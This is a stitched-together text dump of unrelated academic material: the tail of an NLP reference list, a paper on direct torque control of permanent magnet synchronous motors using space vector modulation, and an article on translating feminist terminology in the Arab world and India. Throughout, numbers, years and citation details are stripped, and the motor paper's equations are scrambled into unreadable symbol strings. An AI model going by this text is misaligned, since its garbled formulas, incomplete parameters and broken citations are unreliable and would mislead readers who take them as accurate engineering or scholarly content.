emnlp . zhaopeng tu, zhengdong lu, yang liu, xiaohua liu, and hang li. . modeling coverage for neural machine translation. in acl . tian wang and kyunghyun cho. . larger-context language modelling with recurrent neural network. in acl . kelvin xu, jimmy ba, ryan kiros, kyunghyun cho, aaron courville, ruslan salakhutdinov, richard zemel, and yoshua bengio. . show, attend and tell: neural image caption generation with visual at- tention. in icml . international journal of advanced network monitoring and controls volume , no. , the research of direct torque control based on space vector modulation su xiaohui , chen guodong and xu shuping school of computer science and engineering, xi’an technological university, china email: suxh @ .com abstract. in order to solve the conventional direct torque control contradiction between the dynamic and static performance ,a permanent magnet synchronous motor system direct torque control architecture is proposed based on space vector modulation strategy . in this method flux and torque are controlled through stator voltage components in stator fluxlinkage coordinate axes and space vector modulation is used to control inverters.the simulation verifies that svm-dtcis capable of effectively improving the steady state performance and keeping the excellent dynamic performance of theconventional dtc system simultaneously and remain the switching frequency constant. keywords: simulation, direct torque control, space vector modulation. . introduction direct torque control (dtc) has been widely used in the field of control of permanent magnet synchronous motor (pmsm), because it has the advantages of simple structure and fast dynamic response of the torque, which has been paid more and more attention in recent years [ - ].conventional direct torque control is based on the torque, flux hysteresis controller output and a ° stator flux linkage angle based on the signal, according to certain rules from the prefabricated switch table select the appropriate space voltage vector on the motortorque, flux linkage for bang-bang control [ ].however, according to this way of selecting the voltage vector can not meet the system of torque and flux linkage of the double request, will have a larger torque and flux ripple [ ].in addition, the conventional dtc method can cause the output of the hysteresis controller and the position of the stator flux linkage signal to be constant over multiple sampling periods, resulting in the same switch state of the inverter during these sampling periods, and thus the switching frequency of the system is changednot constant, the capacity of the power device can not be fully utilized [ ].space vector modulation (svm) is used to obtain the desired arbitrary voltage vector by combining adjacent effective voltage vector and zero- voltage vector in one sampling period, and the voltage vector is linearly adjustable [ ]. . space vector modulation algorithm there are eight switching states for three-phase voltage source inverters, corresponding to six active voltage vectors: u ( ), u ( ), u ( ), u ( ), u ( ), u ( ) and two zero-voltage vectors u ( ), u ( ). space vector modulation is applied to the motor is based on three-phase symmetrical sinusoidal voltage supply ac motor generated by the ideal circular flux trajectory as the the research of direct torque control based on space vector modulation base, through the eight basic space voltage vector to the equivalent reference voltage vector so that the actual motor the air-gap trajectory approaches the ideal circle. as shown in fig. , in the coordinate system, the first sector is used as an example to synthesize the reference vector with two adjacent voltage vectors u , u and zero vectors u (u and u ). according to the volt-second balance principle: * s st t t t+ + =u u u u ( ) where, t , t , respectively u , u role of time, t is zero vector of time, t for the pwm cycle. the meaning of formula ( ) is that the integral effect produced by the vector in t time is the same as the integration effect of u , u and zero vector u . figure. space voltage vector and sector ( ) u , u and in axis decomposition obtained:          −−= = −= ) ( tttt u u t t uu u t t s dc s dc s β βα ( ) the amplitude of the fundamental voltage of the output voltage increases linearly with time, and the time t of the zero vector u decreases gradually, but the following relationship should be satisfied:    ≥ ≤+ t ttt s ( ) similarly, in the remaining five sectors, the basic space voltage vector will change with the region of the corresponding changes. this allows svm technology to synthesize any required space voltage vectors. space vector modulation is to use a certain frequency ( / ts) and amplitude ( ts / ) of the equivalent time triangular wave to modulate a, b, c three-phase switching time tcm , tcm , tcm ,that is, the modulation signal. from the basic modulation principle of svm, the maximum linear range of svm is the inscribed circle shown in fig. , that is, the space vector modulation in the inscribed circle is linear modulation, while the over-inscribed circle is overmodulation . the following simulation and international journal of advanced network monitoring and controls volume , no. , experimental analysis and comparison of different reference voltage vector in the case, svm modulation signal and output line voltage waveform and the relationship between. . dynamic control of stator flux linkage figure depicts the relationship between the stator flux linkage and the space voltage vector in the motor operation and the relationship between the stator flux in a single sampling period t dynamic control process stator flux. figure. flux linkage diagram in fig. , the phase angle sγ of the stator flux vector sø at the present moment can be estimated by the flux estimator in the stator two-phase stationary coordinate system αβ ,if the control system gives the reference flux linkage * sø with the phase angle * sγ , the stator flux linkage δ∆ angle ahead of the current time, if the actual flux vector arrives at the reference flux linkage at the next sampling time, a space voltage vector * su as shown in the figure should be applied in the time period of the sampling period t , the reason for this is that the magnitude and phase angle of the applied space voltage vector u * can be calculated from equations ( ) ~ ( ) by moving the end points of the flux vector in the direction of the applied space voltage vector. * * * cos( ) cos cos( ) coss s s s s s s s s s s s s u r i t tα α γ δ γ γ δ γ+ ∆ − + ∆ − = + ≈ øøøø ( ) * * * sin( ) sin sin( ) sins s s s s s s s s s s s s u r i t tβ β γ δ γ γ δ γ+ ∆ − + ∆ − = + ≈ øøøø ( ) * * * s s su uα β= +u ( ) * * *arctan( / )s s su uβ αϕ = ( ) where *su α and * su β are the components of the reference voltage vector * su in the two-phase stationary coordinate system αβ , respectively, * su and *sϕ , respectivelyis the amplitude and phase angle of * su . the stator flux vector magnitude and phase angle, torque can be calculated by the following formula: the research of direct torque control based on space vector modulation     −= −= ∫ ∫ dtiru dtiru ssss ssss )( )( βββ ααα ψ ψ ( ) s s sα βψ ψ ψ= + ( ) )/arctan( αβ ψψγ sss = ( ) )( αββα ψψ sssspe iint −= ( ) the subscripts α and β are the components of each physical quantity on the αβ -axis of the stator two-phase stationary coordinate system. . direct torque control of space vector modulation the structure diagram of the direct torque control system (svm-dtc) of permanent magnet synchronous motor based on space vector modulation is shown in fig. , where the reference flux calculation model element and the space voltage vector modulation element svm replaces the flux linkage in a conventional dtcand a torque hysteresis controller and switch table. figure. svm-dtc block diagram of the structure in fig. , the difference between the reference angular velocity * sω and the feedback angular velocity ω is output to the reference torque command *et via a pi regulator.as the steady-state stator flux rotation speed and the rotor speed of rotation is the same, that is, synchronous speed ω , and when the reference torque or load torque in the dynamic process of mutation, the two speeds will be significantly inconsistent, the stator the flux rotation speed is significantly faster than the rotor rotation speed, there is a difference between the two rotational speed difference sω∆ .thus, the difference between the reference torque * et and the estimated torque et can be output by a pi regulator, which is the stator flux rotational speed increment sω∆ ,to reflect the dynamic change of the torque in real time.thus, the total rotational speed * sω of the flux linkage in one sampling period can be determined by the steady-state rotation speed ω and the rate of changeof the rotational speed difference sω∆ , that is, the system should be in dtd /θ *ω ω + - + as bs cs θ encoder pmsm vsisvm fl ux and torque esti mate e t * et - dcu pi flux model reference * sψ sγ ω  + - sψ * sψ st sψ∆  * supi + + sω∆ *sω abci international journal of advanced network monitoring and controls volume , no. , the next sampling period given the flux reference speed.after obtaining the total flux rotation speed * sω , the reference flux vector * sø given in the next sampling period can be obtained by referring to the flux linkage calculation model.the reference flux vector * sø and the estimated flux vector sø of the current time can be calculated in the next sampling cycle should be applied to the space voltage vector * su , space voltage vector * su and then through the space voltage vector modulation unit svm to generate pwm pulse signal as , bs and cs , the final control voltage source inverter vsi drive permanent magnet synchronous motor.this new structure has the following advantages: pi regulator parameter adjustment is easy, and will not make the entire control system is running difficult.the product δ∆ of the stator flux angle at the next time can be obtained by multiplying the flux rotation speed * sω and the sampling period t . therefore, it is possible to adjust t todetermine δ∆ , which is easy to implement in the actual system. . simulation analysis the svm-dtc control of permanent magnet synchronous motor (pmsm) based on the above- mentioned principle is established by matlab / simulink simulation softwaresystem model.the simulation motor parameters are: un = v; np = ; rs = . ohms; ld = . mh; lq = . mh;f = . wb.specific simulation conditions are set to: no-load start, the initial speed r / min, . s step to r / min,the load was applied to the n • m at . s. figures to show the performance comparison of the conventional dtc and svm-dtc simulation results, respectively.as can be seen from the figure,the response time of this control system is very short, almost no overshoot, which is the direct torque control of the outstanding advantages.from the torquewaveform, the control mode of dynamic response is very fast, steady-state svm-dtc torque fluctuations more stable, which canit is seen from the current waveform that the current waveform of the svm-dtc is closer to the sine wave than the conventional dtc current waveform.these differences is that the conventional dtc can only be controlled by selecting six basic active space voltage vectors and a hysteresis controller and svm-dtc can use svm to arbitrarily linearly combine the required space voltage vector to by real-time sampling calculation can be more precise control of the stator flux linkage. (a) conventional dtc velocity response curve (b) svm-dtc velocity response curve figure . two kinds of control speed response curve the research of direct torque control based on space vector modulation (a) conventional dtc torque response curve (b)svm-dtc torque response curve figure. two kinds of control torque response curve (a)conventional dtc phase current curves (b)svm-dtc phase current curve figure. two kinds of control phase current curve torque figure for the svm-dtc control process of the motor torque angle δ waveform of the change, we can see that the torque angle is electromagnetic torque changes consistent.in most steady- state processes, the torque angle δ is in the vicinity of a fixed value to do a small wave and the torque angle also changes rapidly in the dynamic process of rapid torque change. figure. torque angle δ curve international journal of advanced network monitoring and controls volume , no. , . conclusion in order to solve the contradiction between dynamic and static performance of conventional direct torque control, that is, the contradiction between torque, fast response of flux linkage and torque, and large steady-state pulsation of flux linkage, this paper proposes a space vector based on space vector (pmsm) direct torque control (svm-dtc), the principle and implementation of the scheme are discussed in detail. it is pointed out that the conventional dtc can only control the motor torque and flux linkage with a limited basic voltage vector, but none of the basic space voltage vectors can completely compensate the flux and torque errors in the system at the same time. vector modulation (svm) is a promising solution. secondly, the basic principle of svm is expounded briefly. the svm algorithm under different reference voltage vector input is analyzed, simulated and experimented. the svm algorithm and its application are discussed in detail. implementation has a clearer understanding. finally, the svm-dtc is discussed in detail, including the structure of the control system, the dynamic control process of the stator flux vector, the method of flux and torque estimation and the calculation model of the reference flux, etc. theoretically, and the best compensation principle of flux error. finally, the realization of svm-dtc is studied, and compared with conventional dtc, the correctness of the control strategy is verified. simulation results show that compared with conventional direct torque control, svm-dtc has the advantages of faster dynamic response of conventional dtc and more stable steady-state operation while keeping the switching frequency of power devices constant. because svm-dtc has low hardware requirements and good control performance, it can effectively solve the contradiction between dynamic and static performance of conventional dtc, so it has good application prospects. acknowledgment the authors wish to thank the cooperators. this research is partially funded by the project funds in shaanxi province department of education ( jf ) and the project funds in shanxi province department of science industrial projects( gy ). references [ ] zhang wei, michael s,branicky, stephen m, phillips,stability of networked control systems, ieee control systems magazine february , ( ): - . [ ] goodwin c, juan carlos aguero,ariefeuer, state estima tion for systems having random measurement delays usingerrors in variables, the th triennial world congress barcelona,spain, . [ ] lee kyung chang,lee suk, remote controller design of networked control system using genetic algorithm, isie ,pusan,korea in ieee, : - . [ ] almutairinaif b,chow moyuen, pi parameterization using adaptive fuzzy modulation (afm) for networked control systems - part i : partial adaptation [j],ieee proceedings of iecon ,sevilla,spain, . - . the research of direct torque control based on space vector modulation [ ]huang j q , lew is fl, liu k a, neural predictive control for telerobotswith time delay [j]. journal of intelligent and robotic system s, , : - . [ ]lian fengli analysis, design, modeling,and control of networked control systems, ph.d. thesis,the university of michigan, . [ ] huang j q , lew is fl, liu k a, neural predictive control for telerobotswith time delay [j]. journal of intelligent and robotic system s, , : - . about the author su xiaohui, ( - ), male (the han nationality), shaanxi province, working in xi’an technological university, vicect professor, the research area is computer control. correspondence address (school of computer science and engineering , xi’an technological university) postal code: tel: email: suxh @ .com untitled o p e n a c c e s s research article instigating social change: translating feminism in the arab world and india alanoud alsharekh* abstract the most common accusation levelled at those working in gender studies in the arab world is tied to the fact that they are commonly viewed as dealing with a “western” concept; corrupting the cultural and traditional value system of the arabo-islamic heritage of the region. linguistic resistance to this field is an obvious impediment to its progression, with a range of dissatisfactory and often conflicted terminology meant to distance the language from the very concept of feminism: nassawiyar unthawiya, both alien-sounding and cumbersome. engaging in the act of translation in a linguistic and cultural vacuum means that the translator becomes an active agent in developing and shaping concepts associated with feminism, while simultaneously conveying the social and moral values that are associated with the quest for female empowerment in the west. this same burden of shaping concepts and creating them while actively engaging in the act of translation was faced by indian translators of feminism and those working in the field of gender studies beforehand. this paper will attempt to look at the experience of the importance of translation in the field of gender studies in the developing world and the similar hurdles and triumphs that were experienced by those working in the field in india and in the arab middle east. keywords: comparative feminism, translation, india, arab cite this article as: alsharekh a. instigating social change: translating feminism in the arab world and india, qscience connect (special issue on translating the gulf: beyond fault lines) :tii. http://dx.doi.org/ . /connect. .tii. http://dx.doi.org/ . /connect. .tii. submitted: july accepted: december ª alsharekh, licensee hbku press. this is an open access article distributed under the terms of the creative commons attribution license cc by . , which permits unrestricted use, distribution and reproduction in any medium, provided the original work is properly cited. women’s study and research center, kuwait university *email: aalsharekh@gmail.com introduction in a broad sense, feminist theory and feminism have been institutionalised in the west, and have garnered credibility through the different scholarly approaches that have interacted with and built upon the canon. as a social and political movement it has a clearly delineated trajectory, with the emergence of manifestos that demanded equal rights for women, by women, around the tail end of the th century in europe. the indian experience entailed similar demands for a change in the status of women around the end of the th century, but like arab feminism, this had its roots in both colonialist demands for an end to ‘barbaric’ practices against women, and a newly educated male elite that wanted to improve the condition of women but not necessarily emancipate them. so calls for educational reform in india were in a similar vein to qasim amin’s call for educating the “mothers of the nation” in egypt (amin, ) this brings us to the two main ideas that will be discussed in this paper; firstly that the translation of feminist texts in india and the arab world involves the invention of new terms and terminologies that are introduced alongside the translated concepts. this process is compounded in both regions by the post-colonial baggage of the feminist movement, and its early adoption by men who had different agendas than the feminists themselves. secondly, translators in both regions become active instigators of social disruption, and can either hold back, or expedite the dissemination of feminist ideas and their absorption into the local culture through the terminology they choose to use, and whether it is a “faithful” meaning literal, or a “grounded” meaning practical, translation as j. devika named them (devika, ). in the same way that bassnett and trivedi argue that “translation does not happen in a vacuum, but in a continuum..[as] part of an on-going process of intercultural transfer” (bassnett & trivedi, , p. ), feminist translation develops both from the theory of gender biased responses, and the activism side of the movement. therefore it is in a constant state of flux, absorbing and building on developments in the socio-political sphere. re-examining juliet mitchell’s description of feminism as “the longest revolution” (mitchell, ) in the context of translation, we would find revolutions within the feminist tract itself. while the position of euro-centric feminists centred on the assumption of the universal suppression of women, with first and second wave feminists likening their position to that of other disenfranchised groups, “the jews and the blacks” as simone de beauvoir put it in the second sex (de beauvoir, , p. ), later waves revolted against this idea of a uniform female experience. while marxist feminists were in revolution against the social hierarchies inherent in first wave arguments, feminists of non-white ethnicities were in revolt against the insidious racism of white feminist discourse. the translator of feminist tracts, in dealing with multiple layers of feminist ideology and cultural meanings, can also be placed as a direct agent of this feminist revolution. especially since those translating feminist concepts are likely to also be those who are engaging in feminist acts, at the very least, in gynocriticism. the canadian poet and translator erin moure argues that, “choosing what to translate is a political act, it’s a community act. it’s an act that’s culturally constructed” (moure, ) but translating in the arab world and india is, to quote spivak ( ) “often a political exercise of a different kind” (p. ). in both regions the translator is dealing with a multitude of ethnically different political and cultural ideologies that have brushed up against global ones and embraced them at a point in time, such as communism in the south of the indian subcontinent, and the socialist regimes in iraq, syria and egypt. both regions have a high formal language and different dialects that act as everyday languages coloured by geographical influences outside its borders. both are especially hostile to feminist intervention and have been accused of backward practices by western observers since the beginning of the state formation project in the s and s. of course, india’s size, population and industrial prowess places it far ahead of the arab middle east in terms of the sheer volume of feminist output, and the national recognition of a leadership figure in indira ghandi, although it has yet to be repeated again, places it in a more advanced cognitive space in feminist terms than the arab-speaking world. the homogeny of india as a subcontinent is also markedly different than the many arab identities that make up the twenty-one countries of the arab world, especially after the post-liberation statehood projects began to get involved in the national identity manufacturing process. the latter meant that the legal and social position of women progressed at widely differing rates in the various arab countries, and thus produced a varying range of engagements with feminist thought, texts and translations. lastly india has established matrilineal and supposedly matriarchal societies (such as the khasis of north east india and the now no longer practiced marumakkathayam inheritance system in kerala) whereas the arab states have no such practices in their socio-cultural history. page of alsharekh. qscience connect :tii. translating a universal struggle according to jeremy munday ( ) feminist engagement with the act of translation has focused on four main concerns (p. ). the first, which both indian and arab writers have not engaged with enough, centers around uncovering the role of female translators themselves and their historical limitations. however the dearth of academic texts on the issue of female translators can be compensated by arab writers such as fatima mernissi’s attempts to challenge the traditional historical relegation of women to the side-lines with books such as the forgotten queens of islam (mernissi, ), and the many anthologies and volumes written on uncovering the misrepresented history of women in india. this ties in with the second concern, which attempts to dismantle the ideological and historical correlation of translation with traditional gender construction, so that the feminist translator is not only instigating social change but uncovering the traditional reasons behind the status quo, and much of the third concern, that of critiquing the translation of feminist texts falls into this category. the last concern, that of gendered language and choosing what gender biases and societal practices to omit or include in a specific text is perhaps the one that the post-colonialist feminist translator in the arab world and india struggles with most. the problem with traditional feminist translation theory is in its insistence on the lowly status of both feminism and translation. sherry simon ( ) saw that the literary view on translated texts as derivative of and inferior to the original text is similar to how women were repressed and relegated to a less prominent role in society and literature. she advocated an adherence to a feminist translation project by which “feminist translators openly advocate and implement strategies (linguistic or otherwise) to foreground the feminist in the translated text.” (hatim & munday, , p. ). this leads to what lori chamberlain ( ) calls the “sexualisation of translation” and requires the translator and the original author to engage in a subversive collaboration to restore or uncover the hidden feminist message that has been previously suppressed. here the translator, who these theorists argue is lesser than the creator of the original text, is able through the act of translation to undermine the sexist marginalisation and engage in the creative process of “liberating” the feminine, much like the social act of women’s emancipation. although both translators of feminist texts in india and the arab world cannot avoid a form of this re- inventive process the idea of starting off from an inferior position (that of woman, or that of translator) can get prickly in a post-colonial setting, where the sensitivities towards this type of cultural positioning can run especially high. chakravarty ( ) states that: yet, this overlooks the fact that a preoccupation with “fidelity” or “authenticity” was not part of the tradition in india before colonial times. ours was a polyglot culture with a strong oral tradition, and linguistic and regional borders were fluid; in this scenario, it was inevitable that texts should travel in translation (p. ). this description also works for the nature of translation in the arab world. in fact, there was no belief in the inferiority of the translator, who was seen as an essential vessel to transmit a foreign culture’s knowledge into arabic whether at the time of the islamic empire expansion, or during colonial occupation when the printing presses allowed for a wider dissemination of western texts (al-khalili, ). as women in both india and the arab world continue to explore feminist texts and translations, the lack of organic and home-grown feminist translation theories will be supplanted and replaced by those starting from a viewpoint that is more authentic and less concerned with the western perception of translation and more concerned with the “fluidity” of texts in regions historically immersed in multi-cultural exchanges. feminist perceptions in translation examining the translated choices in the arabic language and in india’s regional languages gives us a vivid example of this protracted wrangling between translating the social act and actually engaging in social action. feminism is deeply rooted in social service and social justice, and therefore contains an implicit invitation to overthrow existing social systems that are oppressive to women as a weaker social group. the universal application of the gender issue frames the national in the international, the personal in the political, thereby making the implicit call for action, an explicit one. feminism’s disruptive properties in traditional indian and arab societies caught up in preserving “family values” that centre on inherited sexual hierarchies and gender roles can be seen in its challenging of attitudes, behaviours, laws, policies and institutional frameworks that seek to keep women occupied within a rigidly controlled domestic space. in the shift from source to translated page of alsharekh. qscience connect :tii. language feminism’s focus on inclusion, fairness and equal opportunity and it’s challenges to notions of manhood, gender, language and family are subjected to critical analyses by the interpreter. as simon ( ) put it “complicities between gender and translation become the basis of a consciously transformative project” (p. ). those working in gender studies in india and the arab world are viewed as dealing with a “western” concept with an imperialist agenda; corrupting the cultural and traditional value system of the indigenous heritage of the region. the cultural rejection of feminist discourse derives a lot of its power from labeling it an “imported” problem. linguistic resistance to this field is one of the more obvious impediments to its progression, with a range of dissatisfactory and often conflicted terminology meant to distance the language from the very concept of feminism. the arabic “nissawiya” or “unthawiya”, both provide incomplete descriptions of feminism as they focus on the biological aspect and disregard the more encompassing feminist “world view”. when figures such as alice walker reject “feminism” as a white women’s term and replace it with womanism, this creates an ever-larger dilemma for the translator by forcing them to take a side in the on-going debate . . . which arabic “iya” to go with which english “ism”? the indian term “streevadam” is a similar reduction to the literal meaning of “argument on behalf of women”, which fails to convey the spectrum of feminist concerns. devika ( ) argues that both the emphasis on literal interpretations and the conservative nature of the local community which “discourages the active discussion of themes like sexuality, very often decides the limits of feminist innovation in language” (p. ). this becomes more complicated as developments in western feminism push the limits of linguistic and cultural flexibility further with concepts such as “intersectionality”, “gender-queer” and “femi-nazi”, which may not be suitable or useful in the current social climate of the target language. the burden of translation at present, the field of gender studies seems to be in a translation transition. devika ( ) claims that the word “gender” started to appear in the popular discourse of indian development and decentralisation in the s, as it was seen as less divisive than feminism. the most commonly used term, “lingapadavi”, merely means “the status of sex”. in india and the arab world, naming the field of gender studies is a problem in itself because sex as a socio-cultural issue and sex as biologically determined were rarely considered as separate enough to merit different words before the advent of translated feminism. al-dabbagh and ramadan ( ) make the same claim for the use of “gender” as a less divisive term in the arab world, and explain how many arab feminists rejected it because of this shift in focus from women to the more inclusive “women and men”. as more and more universities and independent researchers in the arab world engage with the study of gender and feminism, the usage will probably evolve and normalise so that its not as alien-sounding as saadalbazie’s ( ) suggestion “jinthawiyah”, or the more common obtuse term “al-no’a al ijtima’ee”, or the lazy and odd sounding “jandarah”. spivak ( ) examines the awkwardness and relative novelty of the words gender and gendering in the english language itself, and quotes the bangladeshi activist and author farida akhter as complaining that “the real work of the women’s movement and of feminism is being undermined by talk of “gendering”, mostly by the women’s development wings of transnational nongovernment organisations, in conjunction with some local academic feminist theorists” (spivak, , p. ). similarly, the united nations programs have tried to push the word “jinsaniyah” as the arabic version of gendering, a mixture of the word for humanity “insanniyah” and that for sex “jinss”, and it has so far resisted adoption outside of the organisation. besides the different psychological burdens of post-colonialism that indian and arab feminist discussions start off from, there is the obvious gap in theoretical background. although there has been many interesting and valid publications in the past four decades that dealt with comparative, islamic and the unfortunately named third world feminism, the main theoretical underpinnings of mainstream feminist thought and critical approaches comes from two western, liberal humanist schools of thought; anglo-american feminism, which deals mostly in biology, and the french feminist school, which divorces feminism from the biological state of womanhood, so that both men and women can be feminist in their writings and their outlook. both approaches rest on the exaltation of the culture of the individual, and individual rights, which is problematic when dealing with cultures where collectivism, and communal harmony are the ideological basis such as india and the arab countries. this can make the most simplistic of feminist exchanges lose their meaning, and makes it difficult to translate even the most basic concepts that are essential to the feminist theoretical lexicon, like the word “patriarchy”. page of alsharekh. qscience connect :tii. patriarchy, in its etymology, has greek roots, and in social relevance, is associated with the orthodox christian concept of an ultimate father, a “patriarch”. in an increasingly secularised west, institutionalised control based on male authority, like that exercised by the church over its faithful followers, is easily accessed in “patriarchy’s” metaphoric repressive and restrictive elements. however, when one uses this word in arabic, its christian overtones lose their oppressive suggestive powers and become another manifestation of “foreignness” outside the minority of arab christians who engage daily with the term. patriarchy, which is central to the universal themes of hierarchal and institutionalised male dominance, is often translated into the more arabic sounding “abbawiyah”, or “thukooriyah”, derived from the arabic word for father and male respectively. at any time, when the translator designates who is meant by patriarchy, it is inevitable that he or she are also designating an enemy. the “patriarch”, be he the father, the male sex or the foreign sounding and vehemently christian patriarchy has now been named and shamed in the translated arabic as the root cause of female oppression. another kind of ethical dilemma emerges for those translating the same term in the different regions of india. should patriarchy be translated into high language, like the malayalan term “pitrmedhavitvan”, with its upper caste social implications or alternatively, the more accessible and socially egalitarian “aankioma” ? as devika ( ) points out, high malayalam is deeply influenced by sankrist and divorced from everyday speech, similar to the problems of translating feminist terminology into classical arabic, without even addressing the linguistic minefield for a feminist translator in the inherent favouring of the male sex in the grammar of the language itself. this problem of the sexist nature of language itself has been faced by those outside the field of feminist translation, but more recently, scholars from the arab world and india have started to explore this relationship and its impact on the social contract and gender roles. fatima sadiqi ( ) argues that language is an important component of social power that often works in ways that undermine female empowerment. the same argument for this inherent gender bias has been made by both indian scholars and western scholars with varying degrees of argumentation on how much this then effects the socio-political positioning of women within a particular linguistic community. cultural dominance and feminist translation part of the feminist activist and translation movement has attempted to co-opt the overarching male subtext of literary tracts through having dedicated publishing houses looking into the lost “feminist” text. kothari ( ) suggest that: a more tangible interlocking of gender and translation is visible in “small” and “niche” presses focusing upon women’s texts. in india, stree and kali for women undertake translation on a wide scale as a means to access women’s voices (p. ). similarly noor publishing house in egypt, was dedicated mainly to the output of female authors, and was the organising impetus behind the arab women’s writer book fair in cairo. valentine moghadam ( ) argues that publications such as al-raida, a quarterly feminist journal published by the institute of women’s studies in the arab world of the lebanese american university which has been operating since is “another way that mena women have been contributing to civil society . . . through literary efforts, including the publication of books, journals and films” (p. ). in the arab world, western interest in women’s writing specifically, perhaps as a result of the orientalist infatuation with the “oppressed” female figure, and this has resulted in many translated feminist novels and anthologies dedicated to arab women’s writing (boothe, , p. ). yet, even this can be a thorny issue because of the choice of which writer to translate can be driven by either commercial or sensational drivers that may not always have an essentially arab feminist concern. garnet publishing house in london dedicated a series of publications edited by fadia faqir dedicated solely to arab women writers, and although she argues that western interest and exposure is ultimately a good thing, amal amireh ( ) argues that there is an element of cultural domination involved in translating feminist works: to understand the problem arab women writers face we need to look at the long and complex history of their reception in the west. historically, the west’s interest in arab women is part of its interest in and both words mean patriarchy in malalayam, according to j. devika ( ): “aankioma is now widely used in malayalam for patriarchy, as an alternative to pitrmedhavitvan. in a sense this is really the implicit recognition of the impossibility of homolingual address assumed by much translation - of the fact that the presence of a national language does not mean it is equally available to all nationals alike.” page of alsharekh. qscience connect :tii. hostility to islam. this hostility was central to the colonialist project, which cast women as victims to be rescued from muslim male violence. the fixation on the veil, the harem, excision, and polygamy made arab women symbols of a region and a religion that were at once exotic, violent, and inferior. (p. ). this holds true for the darling of western translation nawal al saadawi’s work, and especially her fiction which is often described as subpar by her peers and other arab women writers. spivak ( ) warns of this desire to be all-embracing as a feminist translator, cautioning that a good translator “must have a tough sense of the specific terrain of the original, so that she can fight the racist assumption that all third world women’s writing is good” (p. ). the colonial context challenges the universality of feminist translation in another way. spivak ( ) argues that it is not always empowering to the feminist writer to be pigeonholed into a cultural space through the medium of translation: “i am often approached by women who would like to put devi in with just indian women writers. i am troubled by this because “indian women” is not a feminist category . . . there is an ethnocultural agenda, an obliteration of third world specificity as well as a denial of cultural citizenship, in calling them merely “indian” ” (p. ). this also holds true for many arab women writers who write in english and french and yet cannot be seen as part of a western cannon. yet, spivak and others in the postcolonial feminist field examined how translation could become a vehicle of feminist solidarity. by engaging in the act of translation in a linguistic and ideological vacuum the translator becomes an active agent in developing and shaping target language concepts associated with feminism, while simultaneously conveying the social and moral values that are associated with the quest for female empowerment in the west. this burden of feminist creation was used to counter accusations of being mere vessels of a racist system that uses women’s issues to attack local culture and traditions. essays like “why kali wont rage” (banerji, ) and leila ahmad’s arguments on colonialism and islam (ahmed, , p. ) attempted to re-address the feminist position by offering alternative narratives to the colonialist emphasis on backward practices in the colonies, such as the emphasis on the practice of sati (the funeral ritual of widow suicide by burning) in india, or through exposing the hypocrisy of lord cromer’s pro-female emancipation position in egypt while he headed the anti-suffragette league in britain. decades later these same issues are still being challenged and re-addressed by arab and muslim feminists in a post – , post-isil world, against the reductionism of what evelyn alsultany ( ) describes as “the politics of pity” and within the messy ethics of cultural relativism when the plight of women continues to be highlighted by invading western forces like the us presence in afghanistan (abu-lughod, : p. ). conclusion: post-post colonist approaches “translating feminism” was the subject of a public conversation that took place at the moma new york in november . artists and activists from latin america, poland and india were brought together to discuss how feminism has often been derided as a bourgeoise pursuit, out of touch with more urgent concerns in the context of political oppression and dictatorship. equally in the arab world and india, there is a sense of frivolity and privilege associated with feminism in an impoverished and political unstable part of the world. pandey ( ) argues that for indians “where inequality has been institutionalised in a hierarchal manner, the concepts of individual equality and freedom are new and being offered from above” (p. ), and the same high brow accusation has been levelled at arab feminist scholars such as nawal al saadawi and fatima al mernissi, who find much more credibility and respect in the west than in the arab world as experts in their field. researchers from the global south, another unfortunate sweeping name, tried to engage with latino, african and asian discourses that dismantle the idea that feminism is purely an imported western concept (though as this essay proves, it is nearly impossible to have a south-south dialogue that doesn’t in some way reference a “northern” theoretical base). audre lorde’s ( ) famous essay on how the master’s tools will never dismantle the master’s house will continue to drive some aspects of indigenous and post-colonial feminism, but as grass-root movements take hold and those arguments are subsumed within the relentless internationalism that the world wide web forces on us, these concerns are starting to wane in importance. safar, the sikh feminist research institute seeks to promote and sustain sikh feminist “research, praxis and activism” through realising the “sikh gurus’ principles of egalitarianism and empowerment”. safar is based in canada and communicates mostly in english, further proof that to find an indigenous feminist rhetoric, or to re-write a more gender page of alsharekh. qscience connect :tii. balanced regional history undistorted through patriarchal practices, an engagement with the language or the tools of the other, of the west, is often necessary. another example of moving on from the constraints of post-colonial feminism is kohl, a new journal that engages with the body in arabic, french and english. kohl invites contributions that explore issues of gender and sexuality in the arab middle east even as the language and the region are not yet able to accommodate this conceptually evolved foray. estaygazat is an online syrian feminist platform that started in , that in spite of its anti-assad stance and its focus on protest, is being attacked as distracting from the main issues (gebeily, ). its discourses are condemned as shameful and emulating the west because it chooses to engage with the body as western feminists had done before. the evocative name “she has awoken” is part of what devika ( ) calls “retrieving . . . local terms or usages, or coining new ones . . . interpreting them in the light of western political ideas and concepts . . . and strategically deploying them in political discourse.” devika ( ) gives the example of a term coined by anna chandy “adukkalavadam” which can be roughly translated to “kitchenism”, an attempt at highlighting how “the emergent modern patriarchy in kerala allowed a degree of mobility to women and access to paid work, but essentially tied them to domestic concerns.” another example would be the favouring of the term “munadhilahhugoogiyah” by arab feminists, which simply means “rights activists”, rather than any of the agreed upon translations of the word feminist. two indian girls released a rap video in march which quickly went viral (which echoed a sarcastic youtube video by indian actresses called rape: it’s your fault), denouncing the complicity of the indian authorities in covering up incidents of rape (cohen, ). the girls focused on the use of the term “eve-teasing” in india instead of the more powerful and accusatory “sexual harassment” and this is the “grounded” activist feminism that awaits us while we struggle to find linguistic equivalents to the latest feminist trends. the act of naming and renaming is what turns feminist translation into activism in public life. in post arab spring egypt a similar debate was launched through the insistence of female protesters on discussing the issue of sexual harassment, bringing a formerly taboo subject into the light and forcing governments to legislate against it. it seems that young activists in the arab world and india have moved past the “triple bind” (jayawardena, ) created by male-centred imperialists, nationalists and religious revivalist discourse. these women are engaging in a post-postcolonial discourse that doesn’t seem as burdened with disentangling feminism from a historical relationship with the west. they seem to have made a clear distinction between the geographical state of feminists located in the post-colony, and the intellectual stand of postcolonial feminism, and wholly embraced being “in-translation”, which devika ( ) describes as the capacity to combine . . . [the faithful and grounded modes of translation] in politically fruitful ways”. this can be seen in the increasingly emboldened use of art-activism and social media tools to re-appropriate a space for women that is not dictated by male politicians or an over-burdened post colonialist feminist agenda. campaigns such as the blank noise project, started as a student project in a bangalore art school in and has since then developed into an international vehicle for “changing public attitudes towards sexual violence.” regardless of what local or translated terms we give them, the new wave of activists in india and the arab world seem to be the modern embodiment of cesar chavez’s words, “you cannot oppress the people who are not afraid anymore . . . we have seen the future and it is ours” (chavez, ). references abu-lughod l. do muslim women really need saving? anthropological reflections on cultural relativism and its others. am anthropol. ; ( ): – . ahmed l. women and gender in islam. new haven: yale university press; . 